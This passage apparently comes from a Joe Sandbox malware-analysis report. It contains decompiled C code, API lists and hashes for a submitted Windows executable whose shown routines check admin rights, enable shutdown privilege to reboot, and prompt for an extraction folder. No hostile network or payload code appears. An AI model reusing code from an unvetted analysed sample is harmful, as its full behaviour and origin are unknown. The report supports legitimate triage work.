                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                      • String ID: "$"$:$RegServer
                                                                      • API String ID: 1203814774-25366791
                                                                      • Opcode ID: 197b8c08f1d4480a067e0bc1101e8bb9c6db6a28c3e4ff0bec0f8e9958fd30d1
                                                                      • Instruction ID: 7979f0518e35903d1460b7b3b5594545e0511ca9872e5ea93d573e2bc4af8d3d
                                                                      • Opcode Fuzzy Hash: 197b8c08f1d4480a067e0bc1101e8bb9c6db6a28c3e4ff0bec0f8e9958fd30d1
                                                                      • Instruction Fuzzy Hash: E3D1B971A042255EEFBEDA3C88483FA7FB3AB56344F0441EAC596CA185D77489C2CF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E011D18A3(void* __edx, void* __esi) {
                                                                      				signed int _v8;
                                                                      				short _v12;
                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                      				char _v20;
                                                                      				long _v24;
                                                                      				void* _v28;
                                                                      				void* _v32;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				signed int _t23;
                                                                      				long _t45;
                                                                      				void* _t49;
                                                                      				int _t50;
                                                                      				void* _t52;
                                                                      				signed int _t53;
                                                                      
                                                                      				_t51 = __esi;
                                                                      				_t49 = __edx;
                                                                      				_t23 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t23 ^ _t53;
                                                                      				_t25 =  *0x11d8128; // 0x2
                                                                      				_t45 = 0;
                                                                      				_v12 = 0x500;
                                                                      				_t50 = 2;
                                                                      				_v16.Value = 0;
                                                                      				_v20 = 0;
                                                                      				if(_t25 != _t50) {
                                                                      					L20:
                                                                      					return E011D6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                      				}
                                                                      				if(E011D17EE( &_v20) != 0) {
                                                                      					_t25 = _v20;
                                                                      					if(_v20 != 0) {
                                                                      						 *0x11d8128 = 1;
                                                                      					}
                                                                      					goto L20;
                                                                      				}
                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                      					L17:
                                                                      					CloseHandle(_v28);
                                                                      					_t25 = _v20;
                                                                      					goto L20;
                                                                      				} else {
                                                                      					_push(__esi);
                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                      					if(_t52 == 0) {
                                                                      						L16:
                                                                      						_pop(_t51);
                                                                      						goto L17;
                                                                      					}
                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                      						L15:
                                                                      						LocalFree(_t52);
                                                                      						goto L16;
                                                                      					} else {
                                                                      						if( *_t52 <= 0) {
                                                                      							L14:
                                                                      							FreeSid(_v32);
                                                                      							goto L15;
                                                                      						}
                                                                      						_t15 = _t52 + 4; // 0x4
                                                                      						_t50 = _t15;
                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                      							_t45 = _t45 + 1;
                                                                      							_t50 = _t50 + 8;
                                                                      							if(_t45 <  *_t52) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      						 *0x11d8128 = 1;
                                                                      						_v20 = 1;
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      			}


















                                                                      0x011d18a3
                                                                      0x011d18a3
                                                                      0x011d18ab
                                                                      0x011d18b2
                                                                      0x011d18b5
                                                                      0x011d18be
                                                                      0x011d18c0
                                                                      0x011d18c6
                                                                      0x011d18c7
                                                                      0x011d18ca
                                                                      0x011d18cf
                                                                      0x011d19c9
                                                                      0x011d19d8
                                                                      0x011d19d8
                                                                      0x011d18df
                                                                      0x011d19b8
                                                                      0x011d19bd
                                                                      0x011d19bf
                                                                      0x011d19bf
                                                                      0x00000000
                                                                      0x011d19bd
                                                                      0x011d18fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d1912
                                                                      0x011d19aa
                                                                      0x011d19ad
                                                                      0x011d19b3
                                                                      0x00000000
                                                                      0x011d1927
                                                                      0x011d1927
                                                                      0x011d1932
                                                                      0x011d1936
                                                                      0x011d19a9
                                                                      0x011d19a9
                                                                      0x00000000
                                                                      0x011d19a9
                                                                      0x011d194c
                                                                      0x011d19a2
                                                                      0x011d19a3
                                                                      0x00000000
                                                                      0x011d196e
                                                                      0x011d1970
                                                                      0x011d1999
                                                                      0x011d199c
                                                                      0x00000000
                                                                      0x011d199c
                                                                      0x011d1972
                                                                      0x011d1972
                                                                      0x011d1975
                                                                      0x011d1984
                                                                      0x011d1985
                                                                      0x011d198a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d198c
                                                                      0x011d1991
                                                                      0x011d1996
                                                                      0x00000000
                                                                      0x011d1996
                                                                      0x011d194c

                                                                      APIs
                                                                        • Part of subcall function 011D17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,011D18DD), ref: 011D181A
                                                                        • Part of subcall function 011D17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 011D182C
                                                                        • Part of subcall function 011D17EE: AllocateAndInitializeSid.ADVAPI32(011D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,011D18DD), ref: 011D1855
                                                                        • Part of subcall function 011D17EE: FreeSid.ADVAPI32(?,?,?,?,011D18DD), ref: 011D1883
                                                                        • Part of subcall function 011D17EE: FreeLibrary.KERNEL32(00000000,?,?,?,011D18DD), ref: 011D188A
                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 011D18EB
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 011D18F2
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 011D190A
                                                                      • GetLastError.KERNEL32 ref: 011D1918
                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 011D192C
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 011D1944
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 011D1964
                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 011D197A
                                                                      • FreeSid.ADVAPI32(?), ref: 011D199C
                                                                      • LocalFree.KERNEL32(00000000), ref: 011D19A3
                                                                      • CloseHandle.KERNEL32(?), ref: 011D19AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                      • String ID:
                                                                      • API String ID: 2168512254-0
                                                                      • Opcode ID: 00415846f0d704da1adb0e1fb86bcd30b61b9acaee21dba84aa8b870c4b400d9
                                                                      • Instruction ID: b479b92e8be0494e3983e71e67d2290bc25458af5c171c9cb1dc99a0115e9070
                                                                      • Opcode Fuzzy Hash: 00415846f0d704da1adb0e1fb86bcd30b61b9acaee21dba84aa8b870c4b400d9
                                                                      • Instruction Fuzzy Hash: C6312C71A0220ABFDB29DFA9EC88AAFBBBDFF04750F104429E655D2144E7309945CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E011D1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				int _v12;
                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                      				void* _v28;
                                                                      				void* __ebx;
                                                                      				signed int _t13;
                                                                      				int _t21;
                                                                      				void* _t25;
                                                                      				int _t28;
                                                                      				signed char _t30;
                                                                      				void* _t38;
                                                                      				void* _t40;
                                                                      				void* _t41;
                                                                      				signed int _t46;
                                                                      
                                                                      				_t41 = __esi;
                                                                      				_t38 = __edi;
                                                                      				_t30 = __ecx;
                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                      					L12:
                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                      						L14:
                                                                      						if( *0x11d9a40 != 0) {
                                                                      							_pop(_t30);
                                                                      							_t44 = _t46;
                                                                      							_t13 =  *0x11d8004; // 0xdc3102d5
                                                                      							_v8 = _t13 ^ _t46;
                                                                      							_push(_t38);
                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                      								_v24.PrivilegeCount = 1;
                                                                      								_v12 = 2;
                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                      								CloseHandle(_v28);
                                                                      								_t41 = _t41;
                                                                      								_push(0);
                                                                      								if(_t21 != 0) {
                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                      										_t25 = 1;
                                                                      									} else {
                                                                      										_t37 = 0x4f7;
                                                                      										goto L3;
                                                                      									}
                                                                      								} else {
                                                                      									_t37 = 0x4f6;
                                                                      									goto L4;
                                                                      								}
                                                                      							} else {
                                                                      								_t37 = 0x4f5;
                                                                      								L3:
                                                                      								_push(0);
                                                                      								L4:
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								E011D44B9(0, _t37);
                                                                      								_t25 = 0;
                                                                      							}
                                                                      							_pop(_t40);
                                                                      							return E011D6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                      						} else {
                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                      							goto L16;
                                                                      						}
                                                                      					} else {
                                                                      						_t37 = 0x522;
                                                                      						_t28 = E011D44B9(0, 0x522, 0x11d1140, 0, 0x40, 4);
                                                                      						if(_t28 != 6) {
                                                                      							goto L16;
                                                                      						} else {
                                                                      							goto L14;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					__eax = E011D1EA7(__ecx);
                                                                      					if(__eax != 2) {
                                                                      						L16:
                                                                      						return _t28;
                                                                      					} else {
                                                                      						goto L12;
                                                                      					}
                                                                      				}
                                                                      			}

















                                                                      0x011d1f90
                                                                      0x011d1f90
                                                                      0x011d1f93
                                                                      0x011d1f98
                                                                      0x011d1fa4
                                                                      0x011d1fa7
                                                                      0x011d1fc5
                                                                      0x011d1fcd
                                                                      0x011d1fdb
                                                                      0x011d1ee5
                                                                      0x011d1eea
                                                                      0x011d1ef1
                                                                      0x011d1ef4
                                                                      0x011d1f0c
                                                                      0x011d1f2e
                                                                      0x011d1f3a
                                                                      0x011d1f46
                                                                      0x011d1f4d
                                                                      0x011d1f58
                                                                      0x011d1f60
                                                                      0x011d1f61
                                                                      0x011d1f62
                                                                      0x011d1f75
                                                                      0x011d1f80
                                                                      0x011d1f77
                                                                      0x011d1f77
                                                                      0x00000000
                                                                      0x011d1f77
                                                                      0x011d1f64
                                                                      0x011d1f64
                                                                      0x00000000
                                                                      0x011d1f64
                                                                      0x011d1f0e
                                                                      0x011d1f0e
                                                                      0x011d1f13
                                                                      0x011d1f13
                                                                      0x011d1f14
                                                                      0x011d1f14
                                                                      0x011d1f16
                                                                      0x011d1f17
                                                                      0x011d1f1a
                                                                      0x011d1f1f
                                                                      0x011d1f1f
                                                                      0x011d1f86
                                                                      0x011d1f8f
                                                                      0x011d1fcf
                                                                      0x011d1fd3
                                                                      0x00000000
                                                                      0x011d1fd3
                                                                      0x011d1fa9
                                                                      0x011d1fb4
                                                                      0x011d1fbb
                                                                      0x011d1fc3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d1fc3
                                                                      0x011d1f9a
                                                                      0x011d1f9a
                                                                      0x011d1fa2
                                                                      0x011d1fd9
                                                                      0x011d1fda
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d1fa2

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 011D1EFB
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 011D1F02
                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 011D1FD3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 2795981589-3733053543
                                                                      • Opcode ID: 4ea9d8b2316c4ac25960a8872f08037fd3265a6e85af1044877e60808758923d
                                                                      • Instruction ID: ba28f942805567615291c9262248362fb24afac8bc529e438b812e63dde10b7d
                                                                      • Opcode Fuzzy Hash: 4ea9d8b2316c4ac25960a8872f08037fd3265a6e85af1044877e60808758923d
                                                                      • Instruction Fuzzy Hash: 9121E5B1A422057BDB389AB9DC49FBF77B8EB85B50F100068FA12E6185D77484858362
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D7155() {
                                                                      				void* _v8;
                                                                      				struct _FILETIME _v16;
                                                                      				signed int _v20;
                                                                      				union _LARGE_INTEGER _v24;
                                                                      				signed int _t23;
                                                                      				signed int _t36;
                                                                      				signed int _t37;
                                                                      				signed int _t39;
                                                                      
                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                      				_t23 =  *0x11d8004; // 0xdc3102d5
                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                      					QueryPerformanceCounter( &_v24);
                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                      					_t39 = _t36;
                                                                      					if(_t36 == 0xbb40e64e || ( *0x11d8004 & 0xffff0000) == 0) {
                                                                      						_t36 = 0xbb40e64f;
                                                                      						_t39 = 0xbb40e64f;
                                                                      					}
                                                                      					 *0x11d8004 = _t39;
                                                                      				}
                                                                      				_t37 =  !_t36;
                                                                      				 *0x11d8008 = _t37;
                                                                      				return _t37;
                                                                      			}











                                                                      0x011d715d
                                                                      0x011d7161
                                                                      0x011d7165
                                                                      0x011d7178
                                                                      0x011d7182
                                                                      0x011d718e
                                                                      0x011d7197
                                                                      0x011d71a0
                                                                      0x011d71b1
                                                                      0x011d71b8
                                                                      0x011d71c4
                                                                      0x011d71c7
                                                                      0x011d71cb
                                                                      0x011d71d5
                                                                      0x011d71da
                                                                      0x011d71da
                                                                      0x011d71dc
                                                                      0x011d71dc
                                                                      0x011d71e2
                                                                      0x011d71e5
                                                                      0x011d71ee

                                                                      APIs
                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 011D7182
                                                                      • GetCurrentProcessId.KERNEL32 ref: 011D7191
                                                                      • GetCurrentThreadId.KERNEL32 ref: 011D719A
                                                                      • GetTickCount.KERNEL32 ref: 011D71A3
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 011D71B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      • Opcode ID: ae4da7cd84fe476a0f2e25427764a10f90eb54098144a3c84c0278d62aae0946
                                                                      • Instruction ID: 34f4272d54ffe82c03cabcea8b3862e343e9b261449ce4f399f0512a0b05ffdc
                                                                      • Opcode Fuzzy Hash: ae4da7cd84fe476a0f2e25427764a10f90eb54098144a3c84c0278d62aae0946
                                                                      • Instruction Fuzzy Hash: 7A113A71D02218DBCF28DFB8E648A9EBBF5EF08314F654966D811E7244E7309A41CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                      
                                                                      				SetUnhandledExceptionFilter(0);
                                                                      				UnhandledExceptionFilter(_a4);
                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                      			}



                                                                      0x011d6cf7
                                                                      0x011d6d00
                                                                      0x011d6d19

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,011D6E26,011D1000), ref: 011D6CF7
                                                                      • UnhandledExceptionFilter.KERNEL32(011D6E26,?,011D6E26,011D1000), ref: 011D6D00
                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,011D6E26,011D1000), ref: 011D6D0B
                                                                      • TerminateProcess.KERNEL32(00000000,?,011D6E26,011D1000), ref: 011D6D12
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                      • String ID:
                                                                      • API String ID: 3231755760-0
                                                                      • Opcode ID: dd44ca2d95d6270cf2acb9cd1d51eecb1a54c3c9942cda335c5bea362656be6b
                                                                      • Instruction ID: 59a4137d29a499036f371454e374ad39d0e4b11b794826c670547c7a9ae90afe
                                                                      • Opcode Fuzzy Hash: dd44ca2d95d6270cf2acb9cd1d51eecb1a54c3c9942cda335c5bea362656be6b
                                                                      • Instruction Fuzzy Hash: 00D0C932003108FBDB246BF1F80CA593F28EF48292F444020F33983004CA3244918B51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E011D3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				void* __edi;
                                                                      				void* _t6;
                                                                      				void* _t10;
                                                                      				int _t20;
                                                                      				int _t21;
                                                                      				int _t23;
                                                                      				char _t24;
                                                                      				long _t25;
                                                                      				int _t27;
                                                                      				int _t30;
                                                                      				void* _t32;
                                                                      				int _t33;
                                                                      				int _t34;
                                                                      				int _t37;
                                                                      				int _t38;
                                                                      				int _t39;
                                                                      				void* _t42;
                                                                      				void* _t46;
                                                                      				CHAR* _t49;
                                                                      				void* _t58;
                                                                      				void* _t63;
                                                                      				struct HWND__* _t64;
                                                                      
                                                                      				_t64 = _a4;
                                                                      				_t6 = _a8 - 0x10;
                                                                      				if(_t6 == 0) {
                                                                      					_push(0);
                                                                      					L38:
                                                                      					EndDialog(_t64, ??);
                                                                      					L39:
                                                                      					__eflags = 1;
                                                                      					return 1;
                                                                      				}
                                                                      				_t42 = 1;
                                                                      				_t10 = _t6 - 0x100;
                                                                      				if(_t10 == 0) {
                                                                      					E011D43D0(_t64, GetDesktopWindow());
                                                                      					SetWindowTextA(_t64, "lenta");
                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                      					__eflags =  *0x11d9a40 - _t42; // 0x3
                                                                      					if(__eflags == 0) {
                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                      					}
                                                                      					L36:
                                                                      					return _t42;
                                                                      				}
                                                                      				if(_t10 == _t42) {
                                                                      					_t20 = _a12 - 1;
                                                                      					__eflags = _t20;
                                                                      					if(_t20 == 0) {
                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0x11d91e4, 0x104);
                                                                      						__eflags = _t21;
                                                                      						if(_t21 == 0) {
                                                                      							L32:
                                                                      							_t58 = 0x4bf;
                                                                      							_push(0);
                                                                      							_push(0x10);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							L25:
                                                                      							E011D44B9(_t64, _t58);
                                                                      							goto L39;
                                                                      						}
                                                                      						_t49 = 0x11d91e4;
                                                                      						do {
                                                                      							_t23 =  *_t49;
                                                                      							_t49 =  &(_t49[1]);
                                                                      							__eflags = _t23;
                                                                      						} while (_t23 != 0);
                                                                      						__eflags = _t49 - 0x11d91e5 - 3;
                                                                      						if(_t49 - 0x11d91e5 < 3) {
                                                                      							goto L32;
                                                                      						}
                                                                      						_t24 =  *0x11d91e5; // 0x3a
                                                                      						__eflags = _t24 - 0x3a;
                                                                      						if(_t24 == 0x3a) {
                                                                      							L21:
                                                                      							_t25 = GetFileAttributesA(0x11d91e4);
                                                                      							__eflags = _t25 - 0xffffffff;
                                                                      							if(_t25 != 0xffffffff) {
                                                                      								L26:
                                                                      								E011D658A(0x11d91e4, 0x104, 0x11d1140);
                                                                      								_t27 = E011D58C8(0x11d91e4);
                                                                      								__eflags = _t27;
                                                                      								if(_t27 != 0) {
                                                                      									__eflags =  *0x11d91e4 - 0x5c;
                                                                      									if( *0x11d91e4 != 0x5c) {
                                                                      										L30:
                                                                      										_t30 = E011D597D(0x11d91e4, 1, _t64, 1);
                                                                      										__eflags = _t30;
                                                                      										if(_t30 == 0) {
                                                                      											L35:
                                                                      											_t42 = 1;
                                                                      											__eflags = 1;
                                                                      											goto L36;
                                                                      										}
                                                                      										L31:
                                                                      										_t42 = 1;
                                                                      										EndDialog(_t64, 1);
                                                                      										goto L36;
                                                                      									}
                                                                      									__eflags =  *0x11d91e5 - 0x5c;
                                                                      									if( *0x11d91e5 == 0x5c) {
                                                                      										goto L31;
                                                                      									}
                                                                      									goto L30;
                                                                      								}
                                                                      								_push(0);
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								_t58 = 0x4be;
                                                                      								goto L25;
                                                                      							}
                                                                      							_t32 = E011D44B9(_t64, 0x54a, 0x11d91e4, 0, 0x20, 4);
                                                                      							__eflags = _t32 - 6;
                                                                      							if(_t32 != 6) {
                                                                      								goto L35;
                                                                      							}
                                                                      							_t33 = CreateDirectoryA(0x11d91e4, 0);
                                                                      							__eflags = _t33;
                                                                      							if(_t33 != 0) {
                                                                      								goto L26;
                                                                      							}
                                                                      							_push(0);
                                                                      							_push(0x10);
                                                                      							_push(0);
                                                                      							_push(0x11d91e4);
                                                                      							_t58 = 0x4cb;
                                                                      							goto L25;
                                                                      						}
                                                                      						__eflags =  *0x11d91e4 - 0x5c;
                                                                      						if( *0x11d91e4 != 0x5c) {
                                                                      							goto L32;
                                                                      						}
                                                                      						__eflags = _t24 - 0x5c;
                                                                      						if(_t24 != 0x5c) {
                                                                      							goto L32;
                                                                      						}
                                                                      						goto L21;
                                                                      					}
                                                                      					_t34 = _t20 - 1;
                                                                      					__eflags = _t34;
                                                                      					if(_t34 == 0) {
                                                                      						EndDialog(_t64, 0);
                                                                      						 *0x11d9124 = 0x800704c7;
                                                                      						goto L39;
                                                                      					}
                                                                      					__eflags = _t34 != 0x834;
                                                                      					if(_t34 != 0x834) {
                                                                      						goto L36;
                                                                      					}
                                                                      					_t37 = LoadStringA( *0x11d9a3c, 0x3e8, 0x11d8598, 0x200);
                                                                      					__eflags = _t37;
                                                                      					if(_t37 != 0) {
                                                                      						_t38 = E011D4224(_t64, _t46, _t46);
                                                                      						__eflags = _t38;
                                                                      						if(_t38 == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0x11d87a0);
                                                                      						__eflags = _t39;
                                                                      						if(_t39 != 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t63 = 0x4c0;
                                                                      						L9:
                                                                      						E011D44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                      						_push(0);
                                                                      						goto L38;
                                                                      					}
                                                                      					_t63 = 0x4b1;
                                                                      					goto L9;
                                                                      				}
                                                                      				return 0;
                                                                      			}

























                                                                      0x011d321b
                                                                      0x011d321e
                                                                      0x011d3221
                                                                      0x011d343c
                                                                      0x011d343e
                                                                      0x011d343f
                                                                      0x011d3445
                                                                      0x011d3447
                                                                      0x00000000
                                                                      0x011d3447
                                                                      0x011d3229
                                                                      0x011d322a
                                                                      0x011d322f
                                                                      0x011d33ec
                                                                      0x011d33f7
                                                                      0x011d3410
                                                                      0x011d3416
                                                                      0x011d341d
                                                                      0x011d342d
                                                                      0x011d342d
                                                                      0x011d3438
                                                                      0x00000000
                                                                      0x011d3438
                                                                      0x011d3237
                                                                      0x011d3243
                                                                      0x011d3243
                                                                      0x011d3246
                                                                      0x011d32ee
                                                                      0x011d32f4
                                                                      0x011d32f6
                                                                      0x011d33d4
                                                                      0x011d33d6
                                                                      0x011d33db
                                                                      0x011d33dc
                                                                      0x011d33de
                                                                      0x011d33df
                                                                      0x011d3370
                                                                      0x011d3372
                                                                      0x00000000
                                                                      0x011d3372
                                                                      0x011d32fc
                                                                      0x011d3301
                                                                      0x011d3301
                                                                      0x011d3303
                                                                      0x011d3304
                                                                      0x011d3304
                                                                      0x011d330a
                                                                      0x011d330d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3313
                                                                      0x011d3318
                                                                      0x011d331a
                                                                      0x011d3331
                                                                      0x011d3332
                                                                      0x011d333a
                                                                      0x011d333d
                                                                      0x011d337c
                                                                      0x011d3388
                                                                      0x011d338f
                                                                      0x011d3394
                                                                      0x011d3396
                                                                      0x011d33a4
                                                                      0x011d33ab
                                                                      0x011d33b6
                                                                      0x011d33be
                                                                      0x011d33c3
                                                                      0x011d33c5
                                                                      0x011d3435
                                                                      0x011d3437
                                                                      0x011d3437
                                                                      0x00000000
                                                                      0x011d3437
                                                                      0x011d33c7
                                                                      0x011d33c9
                                                                      0x011d33cc
                                                                      0x00000000
                                                                      0x011d33cc
                                                                      0x011d33ad
                                                                      0x011d33b4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d33b4
                                                                      0x011d3398
                                                                      0x011d3399
                                                                      0x011d339b
                                                                      0x011d339c
                                                                      0x011d339d
                                                                      0x00000000
                                                                      0x011d339d
                                                                      0x011d334c
                                                                      0x011d3351
                                                                      0x011d3354
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d335c
                                                                      0x011d3362
                                                                      0x011d3364
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3366
                                                                      0x011d3367
                                                                      0x011d3369
                                                                      0x011d336a
                                                                      0x011d336b
                                                                      0x00000000
                                                                      0x011d336b
                                                                      0x011d331c
                                                                      0x011d3323
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3329
                                                                      0x011d332b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d332b
                                                                      0x011d324c
                                                                      0x011d324c
                                                                      0x011d324f
